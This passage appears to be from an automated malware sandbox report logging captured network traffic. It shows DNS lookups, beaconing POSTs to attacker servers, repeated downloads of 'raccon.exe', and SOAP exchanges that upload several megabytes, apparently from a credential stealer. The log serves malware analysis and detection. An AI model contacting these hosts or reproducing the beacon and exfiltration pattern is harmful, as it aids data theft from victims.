                                                                                          999080321newfolder1002-01352599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01362599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01362599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01372599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01372599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01382599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01382599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01392599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01392599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01402599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01402599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01412599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01412599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01422599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01422599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01432599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01432599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01442599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01442599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01452599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01452599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          Response
                                                                                          999080321newfolder1002-01462599908032135.site
                                                                                          IN A
                                                                                          82.118.23.111
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 339
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:18 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 267
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:18 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 150
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 286
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 361
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 143
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 291
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:19 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 164
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 366
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:20 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 209
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 329
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:21 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 75
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://999080321newfolder1002-01462599908032135.site/raccon.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          GET /raccon.exe HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:22 GMT
                                                                                          Content-Type: application/x-msdos-program
                                                                                          Content-Length: 550912
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Last-Modified: Fri, 09 Jul 2021 23:01:01 GMT
                                                                                          ETag: "86800-5c6b8bed9f570"
                                                                                          Accept-Ranges: bytes
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 235
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 184
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 133
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:23 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 200
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 202
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:24 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://999080321newfolder1002-01462599908032135.site/
                                                                                          explorer.exe
                                                                                          Remote address:
                                                                                          82.118.23.111:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Cache-Control: no-cache
                                                                                          Connection: Keep-Alive
                                                                                          Pragma: no-cache
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://999080321newfolder1002-01462599908032135.site/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 533
                                                                                          Host: 999080321newfolder1002-01462599908032135.site
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:01:26 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 433
                                                                                          Connection: keep-alive
                                                                                          Keep-Alive: timeout=3
                                                                                          Vary: Accept-Encoding
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 137
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 4525
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:32 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 6152946
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 150
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:41 GMT
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://45.32.235.238:45555/
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          45.32.235.238:45555
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                                                          Host: 45.32.235.238:45555
                                                                                          Content-Length: 6152932
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Content-Length: 261
                                                                                          Content-Type: text/xml; charset=utf-8
                                                                                          Server: Microsoft-HTTPAPI/2.0
                                                                                          Date: Fri, 09 Jul 2021 23:01:41 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          api.ip.sb
                                                                                          26F0.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          api.ip.sb
                                                                                          IN A
                                                                                          Response
                                                                                          api.ip.sb
                                                                                          IN CNAME
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.26.13.31
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          104.26.12.31
                                                                                          api.ip.sb.cdn.cloudflare.net
                                                                                          IN A
                                                                                          172.67.75.172
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://api.ip.sb/geoip
                                                                                          7129.exe
                                                                                          Remote address:
                                                                                          104.26.13.31:443
                                                                                          Request
                                                                                          GET /geoip HTTP/1.1
                                                                                          Host: api.ip.sb
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Date: Fri, 09 Jul 2021 23:01:33 GMT
                                                                                          Content-Type: application/json; charset=utf-8
                                                                                          Content-Length: 285
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Vary: Accept-Encoding
                                                                                          Cache-Control: no-cache
                                                                                          Access-Control-Allow-Origin: *
                                                                                          CF-Cache-Status: DYNAMIC
                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=bLfxwrcYYlPeUAWgF37ziSWWSwqdjXGr42nYTTQs7MdNbZOoBfOZ0vPLi%2B%2BMyJEAncm6o6i5YEE8U9AbNYp%2BBJeqPV1sF1Ws%2BOxYU6nQjk3hPWRGObw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 66c52cc3bde6d45b-HAM
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          nusurtal4f.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 303
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 164
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 161
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:00:55 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 327
                                                                                          Connection: keep-alive
